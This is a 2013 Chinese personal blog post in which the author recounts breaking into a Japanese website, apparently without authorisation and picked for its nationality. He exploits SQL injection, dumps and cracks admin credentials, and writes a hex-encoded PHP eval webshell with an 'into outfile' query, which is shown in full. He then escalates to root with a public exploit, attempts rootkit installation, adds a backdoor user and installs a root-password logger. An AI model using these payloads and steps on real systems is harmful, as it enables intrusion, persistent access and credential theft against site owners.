注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

龙少'Blog

 

 
 
 

日志

 
 

安检日本某站  

2013-08-30 10:09:51|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

这站杂说了,看了看标题带了日本2个字,ok,都清楚了,准备好锤子敲进去。

扫描了下站点,发现存在猪肉点,手工测试了下,如图:

2013年08月30日 - 维护网络界的和平 - 龙少Blog

我们来查看下相关的信息,如图:

2013年08月30日 - 维护网络界的和平 - 龙少Blog

是root,权限还不错哦。
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
返回结果都为root,ok看能不能outfile个一句话出来,测试发现不行,纠结啊..
看来只有破解后台密码,进后台拿webshell了。通过load_file读取了配置,发现了后台地址和mysql账号

2013年08月30日 - 维护网络界的和平 - 龙少Blog

 由于mysql是>5.0版本的,测试了下,顺利射出了后台账号和密码

2013年08月30日 - 维护网络界的和平 - 龙少Blog

 

MD5解了之后进后台寻找拿webshell的地方,发现有上传,但是不能利用。经小胖胖查看发现了一个地方可以执行sql语句
于是写个一句话进去看看:select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile ‘/home/xxx/xxx.php’
这回成功了,后台经小胖看了下文件,发现search.php处理SQL语句里 调用了StripSlashes 去掉了斜线。

2013年08月30日 - 维护网络界的和平 - 龙少Blog

拿到webshell了,接下来提权,uname -a看了下

2013年08月30日 - 维护网络界的和平 - 龙少Blog

 查找exp提权获取了root,本想装个ddrk或者mafix后门,结果米有成功,还是加个用户玩玩吧

2013年08月30日 - 维护网络界的和平 - 龙少Blog
用putty登录下看看,root权限
2013年08月30日 - 维护网络界的和平 - 龙少Blog
最后安装个记录root密码的小东西吧

 

  评论这张
 
阅读(182)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017